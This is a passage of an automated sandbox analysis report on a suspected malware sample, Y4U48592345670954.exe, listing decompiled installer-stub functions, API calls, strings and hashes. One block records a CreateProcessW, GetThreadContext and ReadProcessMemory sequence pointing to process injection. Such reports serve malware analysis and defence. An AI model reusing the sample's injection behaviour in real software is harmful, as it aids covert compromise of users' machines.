                                        					if(_t14 != 0) {
                                        						break;
                                        					}
                                        					if(_t19 != 0) {
                                        						continue;
                                        					}
                                        					 *_t20 =  *_t20 & 0x00000000;
                                        					return _t14;
                                        				}
                                        				return _t20;
                                        			}

                                        Instruction addresses (per decompiled line, flattened from the side-by-side view; 0x00000000 marks lines without a mapped instruction): 0x004056c3, 0x004056c9, 0x004056ca, 0x004056ca, 0x004056cb, 0x004056d2, 0x004056dc, 0x004056e9, 0x004056ec, 0x004056f4, 0x00000000, 0x00000000, 0x004056f8, 0x00000000, 0x00000000, 0x004056fa, 0x00000000, 0x004056fa, 0x00000000

                                        APIs
                                        • GetTickCount.KERNEL32 ref: 004056D2
                                        • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403148,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,C:\Users\user\AppData\Local\Temp\), ref: 004056EC
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004056C2
                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056BF
                                        • nsa, xrefs: 004056CB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
                                        • API String ID: 1716503409-3657371456
                                        • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                        • Instruction ID: fc1e422234f16816b4991f84e515e98fc6b5cd585f65b5bef5412ac6235d785f
                                        • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                        • Instruction Fuzzy Hash: F1F0A036748218BAE7104E55EC04B9B7FA9DF91760F14C02BFA089A1C0D6B1A95897A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 02840391
                                        • GetThreadContext.KERNELBASE(?,00010007), ref: 028403B4
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 028403D8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.660079637.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                        Similarity
                                        • API ID: Process$ContextCreateMemoryReadThread
                                        • String ID:
                                        • API String ID: 2411489757-0
                                        • Opcode ID: fc7fbc56690095d52b1bba990d0e76867182a7c5ad0c647a721d7dfe2a4e8f79
                                        • Instruction ID: 3caa227cc6613c026e0a1c0b2457c811b2050fc8b30ebd5aacbe37ea8484e896
                                        • Opcode Fuzzy Hash: fc7fbc56690095d52b1bba990d0e76867182a7c5ad0c647a721d7dfe2a4e8f79
                                        • Instruction Fuzzy Hash: BA322739D4021CEFEB24DBA4DC45BAEB7B5BF44704F20409AE609FA2A1DB705A80DF15
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 73%
                                        			E0040136D(signed int _a4) {
                                        				intOrPtr* _t8;
                                        				int _t10;
                                        				signed int _t12;
                                        				int _t13;
                                        				int _t14;
                                        				signed int _t21;
                                        				int _t24;
                                        				signed int _t27;
                                        				void* _t28;
                                        
                                        				_t27 = _a4;
                                        				while(_t27 >= 0) {
                                        					_t8 = _t27 * 0x1c +  *0x7a2fb0;
                                        					__eflags =  *_t8 - 1;
                                        					if( *_t8 == 1) {
                                        						break;
                                        					}
                                        					_push(_t8); // executed
                                        					_t10 = E00401439(); // executed
                                        					__eflags = _t10 - 0x7fffffff;
                                        					if(_t10 == 0x7fffffff) {
                                        						return 0x7fffffff;
                                        					}
                                        					__eflags = _t10;
                                        					if(__eflags < 0) {
                                        						_t10 = E00405936(0x7a4000 - (_t10 + 1 << 0xa), 0x7a4000);
                                        						__eflags = _t10;
                                        					}
                                        					if(__eflags != 0) {
                                        						_t12 = _t10 - 1;
                                        						_t21 = _t27;
                                        						_t27 = _t12;
                                        						_t13 = _t12 - _t21;
                                        						__eflags = _t13;
                                        					} else {
                                        						_t13 = 1;
                                        						_t27 = _t27 + 1;
                                        					}
                                        					__eflags =  *(_t28 + 0xc);
                                        					if( *(_t28 + 0xc) != 0) {
                                        						 *0x7a276c =  *0x7a276c + _t13;
                                        						_t14 =  *0x7a2754;
                                        						__eflags = _t14;
                                        						_t24 = (0 | _t14 == 0x00000000) + _t14;
                                        						__eflags = _t24;
                                        						SendMessageA( *(_t28 + 0x18), 0x402, MulDiv( *0x7a276c, 0x7530, _t24), 0);
                                        					}
                                        				}
                                        				return 0;
                                        			}

                                        Instruction addresses (per decompiled line, flattened from the side-by-side view; 0x00000000 marks lines without a mapped instruction): 0x0040136e, 0x004013fb, 0x00401382, 0x00401384, 0x00401387, 0x00000000, 0x00000000, 0x00401389, 0x0040138a, 0x0040138f, 0x00401394, 0x00000000, 0x00401409, 0x00401396, 0x00401398, 0x004013a6, 0x004013ab, 0x004013ab, 0x004013ad, 0x004013b5, 0x004013b6, 0x004013b8, 0x004013ba, 0x004013ba, 0x004013af, 0x004013b1, 0x004013b2, 0x004013b2, 0x004013bc, 0x004013c1, 0x004013c3, 0x004013c9, 0x004013d2, 0x004013d7, 0x004013d7, 0x004013f5, 0x004013f5, 0x004013c1, 0x00000000

                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
                                        • SendMessageA.USER32(00000402,00000402,00000000), ref: 004013F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: 4@
                                        • API String ID: 3850602802-2385517874
                                        • Opcode ID: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
                                        • Instruction ID: c77d45609a211084429c3166b5231f0613d514cab4ec9a945a8c79bb8836a1de
                                        • Opcode Fuzzy Hash: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
                                        • Instruction Fuzzy Hash: 9201DE726242109FE7184B39DD09B3B36D8E791314F00823EBA52E66F1E67CDC028B49
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E00403116(void* __eflags) {
                                        				void* _t2;
                                        				void* _t5;
                                        				CHAR* _t6;
                                        
                                        				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                        				E00405BFB(_t6);
                                        				_t2 = E00405538(_t6);
                                        				if(_t2 != 0) {
                                        					E004054CC(_t6);
                                        					CreateDirectoryA(_t6, 0); // executed
                                        					_t5 = E004056BF("\"C:\\Users\\jones\\Desktop\\Y4U48592345670954.exe\" ", _t6); // executed
                                        					return _t5;
                                        				} else {
                                        					return _t2;
                                        				}
                                        			}

                                        Instruction addresses (per decompiled line, flattened from the side-by-side view): 0x00403117, 0x0040311d, 0x00403123, 0x0040312a, 0x0040312f, 0x00403137, 0x00403143, 0x00403149, 0x0040312d, 0x0040312d, 0x0040312d

                                        APIs
                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                          • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                        • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Char$Next$CreateDirectoryPrev
                                        • String ID: "C:\Users\user\Desktop\Y4U48592345670954.exe" $C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 4115351271-22103147
                                        • Opcode ID: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
                                        • Instruction ID: 6026620382323fd49234fcc764212d1b2eb381da62286567b3783a1d3151fd3a
                                        • Opcode Fuzzy Hash: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
                                        • Instruction Fuzzy Hash: 41D0A92100BD3130C581322A3C06FCF091C8F8732AB00413BF80DB40C24B6C2A828AFE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                        			E00405690(CHAR* _a4, long _a8, long _a12) {
                                        				signed int _t5;
                                        				void* _t6;
                                        
                                        				_t5 = GetFileAttributesA(_a4); // executed
                                        				asm("sbb ecx, ecx");
                                        				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                        				return _t6;
                                        			}

                                        Instruction addresses (per decompiled line, flattened from the side-by-side view): 0x00405694, 0x004056a1, 0x004056b6, 0x004056bc

                                        APIs
                                        • GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                        • Instruction ID: fda52db4846bf436787418750c042d71830ab65c4a714c5a55a7f97c147c79cf
                                        • Opcode Fuzzy Hash: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                        • Instruction Fuzzy Hash: 3BD09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CFA82940E0D6755C159B16
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004030CD(void* _a4, long _a8) {
                                        				int _t6;
                                        				long _t10;
                                        
                                        				_t10 = _a8;
                                        				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
                                        				if(_t6 == 0 || _a8 != _t10) {
                                        					return 0;
                                        				} else {
                                        					return 1;
                                        				}
                                        			}

                                        Instruction addresses (per decompiled line, flattened from the side-by-side view; 0x00000000 marks lines without a mapped instruction): 0x004030d1, 0x004030e4, 0x004030ec, 0x00000000, 0x004030f3, 0x00000000, 0x004030f5

                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0D,000000FF,00000004,00000000,00000000,00000000), ref: 004030E4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                        • Instruction ID: 4fd4a8308e5d5898c176f95433ccaa972cd52e025ae54bcd1c8d1e1e5a7d5bbe
                                        • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                        • Instruction Fuzzy Hash: FEE08C32611219BFCF105E559C01EE73F6CEB043A2F00C032F919E5190D630EA14EBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004030FF(long _a4) {
                                        				long _t2;
                                        
                                        				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
                                        				return _t2;
                                        			}

                                        Instruction addresses (per decompiled line, flattened from the side-by-side view): 0x0040310d, 0x00403113

                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 0040310D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                        • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
                                        • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                        • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        C-Code - Quality: 89%
                                        			E00404EA0(long _a4, long _a8, long _a12, unsigned int _a16) {
                                        				struct HWND__* _v8;
                                        				struct tagRECT _v24;
                                        				void* _v32;
                                        				signed int _v36;
                                        				int _v40;
                                        				CHAR* _v44;
                                        				signed int _v48;
                                        				int _v52;
                                        				void* _v56;
                                        				void* _v64;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				long _t86;
                                        				struct HMENU__* _t88;
                                        				unsigned int _t91;
                                        				int _t93;
                                        				int _t94;
                                        				void* _t100;
                                        				intOrPtr _t123;
                                        				struct HWND__* _t127;
                                        				int _t148;
                                        				int _t149;
                                        				struct HWND__* _t153;
                                        				struct HWND__* _t157;
                                        				struct HMENU__* _t159;
                                        				long _t161;
                                        				CHAR* _t162;
                                        				CHAR* _t163;
                                        
                                        				_t153 =  *0x7a2764;
                                        				_t148 = 0;
                                        				_v8 = _t153;
                                        				if(_a8 != 0x110) {
                                        					if(_a8 == 0x405) {
                                        						CloseHandle(CreateThread(0, 0, E00404E34, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
                                        					}
                                        					if(_a8 != 0x111) {
                                        						L16:
                                        						if(_a8 != 0x404) {
                                        							L24:
                                        							if(_a8 != 0x7b || _a12 != _t153) {
                                        								goto L19;
                                        							} else {
                                        								_t86 = SendMessageA(_t153, 0x1004, _t148, _t148);
                                        								_a8 = _t86;
                                        								if(_t86 <= _t148) {
                                        									L36:
                                        									return 0;
                                        								}
                                        								_t88 = CreatePopupMenu();
                                        								_push(0xffffffe1);
                                        								_push(_t148);
                                        								_t159 = _t88;
                                        								AppendMenuA(_t159, _t148, 1, E004059E1(_t148, _t153, _t159));
                                        								_t91 = _a16;
                                        								if(_t91 != 0xffffffff) {
                                        									_t149 = _t91;
                                        									_t93 = _t91 >> 0x10;
                                        								} else {
                                        									GetWindowRect(_t153,  &_v24);
                                        									_t149 = _v24.left;
                                        									_t93 = _v24.top;
                                        								}
                                        								_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148);
                                        								_t161 = 1;
                                        								if(_t94 == 1) {
                                        									_v56 = _t148;
                                        									_v44 = 0x79f580;
                                        									_v40 = 0xfff;
                                        									_a4 = _a8;
                                        									do {
                                        										_a4 = _a4 - 1;
                                        										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
                                        									} while (_a4 != _t148);
                                        									OpenClipboard(_t148);
                                        									EmptyClipboard();
                                        									_t100 = GlobalAlloc(0x42, _t161);
                                        									_a4 = _t100;
                                        									_t162 = GlobalLock(_t100);
                                        									do {
                                        										_v44 = _t162;
                                        										SendMessageA(_v8, 0x102d, _t148,  &_v64);
                                        										_t163 =  &(_t162[lstrlenA(_t162)]);
                                        										 *_t163 = 0xa0d;
                                        										_t162 =  &(_t163[2]);
                                        										_t148 = _t148 + 1;
                                        									} while (_t148 < _a8);
                                        									GlobalUnlock(_a4);
                                        									SetClipboardData(1, _a4);
                                        									CloseClipboard();
                                        								}
                                        								goto L36;
                                        							}
                                        						}
                                        						if( *0x7a274c == _t148) {
                                        							ShowWindow( *0x7a2f84, 8);
                                        							if( *0x7a300c == _t148) {
                                        								E00404D62( *((intOrPtr*)( *0x79ed58 + 0x34)), _t148);
                                        							}
                                        							E00403D80(1);
                                        							goto L24;
                                        						}
                                        						 *0x79e950 = 2;
                                        						E00403D80(0x78);
                                        						goto L19;
                                        					} else {
                                        						if(_a12 != 0x403) {
                                        							L19:
                                        							return E00403E0E(_a8, _a12, _a16);
                                        						}
                                        						ShowWindow( *0x7a2750, _t148);
                                        						ShowWindow(_t153, 8);
                                        						E0040417A();
                                        						goto L16;
                                        					}
                                        				}
                                        				_v48 = _v48 | 0xffffffff;
                                        				_v36 = _v36 | 0xffffffff;
                                        				_v56 = 2;
                                        				_v52 = 0;
                                        				_v44 = 0;
                                        				_v40 = 0;
                                        				asm("stosd");
                                        				asm("stosd");
                                        				_t123 =  *0x7a2f88;
                                        				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                        				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                        				 *0x7a2750 = GetDlgItem(_a4, 0x403);
                                        				 *0x7a2748 = GetDlgItem(_a4, 0x3ee);
                                        				_t127 = GetDlgItem(_a4, 0x3f8);
                                        				 *0x7a2764 = _t127;
                                        				_v8 = _t127;
                                        				E00403DDC( *0x7a2750);
                                        				 *0x7a2754 = E004045FA(4);
                                        				 *0x7a276c = 0;
                                        				GetClientRect(_v8,  &_v24);
                                        				_v48 = _v24.right - GetSystemMetrics(0x15);
                                        				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                        				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                        				if(_a8 >= 0) {
                                        					SendMessageA(_v8, 0x1001, 0, _a8);
                                        					SendMessageA(_v8, 0x1026, 0, _a8);
                                        				}
                                        				if(_a12 >= _t148) {
                                        					SendMessageA(_v8, 0x1024, _t148, _a12);
                                        				}
                                        				_push( *((intOrPtr*)(_a16 + 0x30)));
                                        				_push(0x1b);
                                        				E00403DA7(_a4);
                                        				if(( *0x7a2f90 & 0x00000003) != 0) {
                                        					ShowWindow( *0x7a2750, _t148);
                                        					if(( *0x7a2f90 & 0x00000002) != 0) {
                                        						 *0x7a2750 = _t148;
                                        					} else {
                                        						ShowWindow(_v8, 8);
                                        					}
                                        				}
                                        				_t157 = GetDlgItem(_a4, 0x3ec);
                                        				SendMessageA(_t157, 0x401, _t148, 0x75300000);
                                        				if(( *0x7a2f90 & 0x00000004) != 0) {
                                        					SendMessageA(_t157, 0x409, _t148, _a12);
                                        					SendMessageA(_t157, 0x2001, _t148, _a8);
                                        				}
                                        				goto L36;
                                        			}

                                        APIs
                                        • GetDlgItem.USER32 ref: 00404EFF
                                        • GetDlgItem.USER32 ref: 00404F0E
                                        • GetDlgItem.USER32 ref: 00404F1D
                                          • Part of subcall function 00403DDC: SendMessageA.USER32(00000028,?,00000001,00403C0F), ref: 00403DEA
                                        • GetClientRect.USER32 ref: 00404F4B
                                        • GetSystemMetrics.USER32 ref: 00404F53
                                        • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F74
                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F85
                                        • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404F98
                                        • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FA6
                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FB9
                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FDB
                                        • ShowWindow.USER32(?,00000008), ref: 00404FEF
                                        • GetDlgItem.USER32 ref: 00405005
                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405015
                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040502E
                                        • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040503A
                                        • GetDlgItem.USER32 ref: 00405057
                                        • CreateThread.KERNEL32(00000000,00000000,Function_00004E34,00000000), ref: 00405065
                                        • CloseHandle.KERNEL32(00000000), ref: 0040506C
                                        • ShowWindow.USER32(00000000), ref: 00405090
                                        • ShowWindow.USER32(?,00000008), ref: 00405095
                                        • ShowWindow.USER32(00000008), ref: 004050DB
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040510D
                                        • CreatePopupMenu.USER32 ref: 0040511E
                                        • AppendMenuA.USER32 ref: 00405133
                                        • GetWindowRect.USER32 ref: 00405146
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405168
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051A3
                                        • OpenClipboard.USER32(00000000), ref: 004051B3
                                        • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051B9
                                        • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051C2
                                        • GlobalLock.KERNEL32 ref: 004051CC
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051E0
                                        • lstrlenA.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051E7
                                        • GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,?,00000000), ref: 004051FE
                                        • SetClipboardData.USER32 ref: 00405209
                                        • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040520F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
                                        • String ID: {
                                        • API String ID: 1050754034-366298937
                                        • Opcode ID: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                        • Instruction ID: 09b722d0185256cc624264d40bb0edb6627bdfa233c056c1d5ba82df3b217a72
                                        • Opcode Fuzzy Hash: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                        • Instruction Fuzzy Hash: 0FA14B70900208FFDB11AF64DD89AAE7F79FB48354F10812AFA05BA1A1C7785E41DF69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E004046A7(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                        				struct HWND__* _v8;
                                        				struct HWND__* _v12;
                                        				signed int _v16;
                                        				intOrPtr _v20;
                                        				struct HBITMAP__* _v24;
                                        				long _v28;
                                        				int _v32;
                                        				signed int _v40;
                                        				int _v44;
                                        				signed int* _v56;
                                        				intOrPtr _v60;
                                        				signed int _v64;
                                        				long _v68;
                                        				void* _v72;
                                        				intOrPtr _v76;
                                        				intOrPtr _v80;
                                        				void* _v84;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				struct HWND__* _t182;
                                        				int _t196;
                                        				long _t202;
                                        				signed int _t206;
                                        				signed int _t217;
                                        				void* _t220;
                                        				void* _t221;
                                        				int _t227;
                                        				signed int _t232;
                                        				signed int _t233;
                                        				signed int _t240;
                                        				void* _t252;
                                        				intOrPtr _t258;
                                        				char* _t268;
                                        				signed char _t269;
                                        				long _t274;
                                        				int _t280;
                                        				signed int* _t281;
                                        				int _t282;
                                        				long _t283;
                                        				int _t285;
                                        				long _t286;
                                        				signed int _t287;
                                        				long _t288;
                                        				signed int _t291;
                                        				signed int _t298;
                                        				signed int _t300;
                                        				signed int _t302;
                                        				int* _t310;
                                        				void* _t311;
                                        				int _t315;
                                        				int _t316;
                                        				int _t317;
                                        				signed int _t318;
                                        				void* _t320;
                                        
                                        				_v12 = GetDlgItem(_a4, 0x3f9);
                                        				_t182 = GetDlgItem(_a4, 0x408);
                                        				_t280 =  *0x7a2fa8;
                                        				_t320 = SendMessageA;
                                        				_v8 = _t182;
                                        				_t315 = 0;
                                        				_v32 = _t280;
                                        				_v20 =  *0x7a2f88 + 0x94;
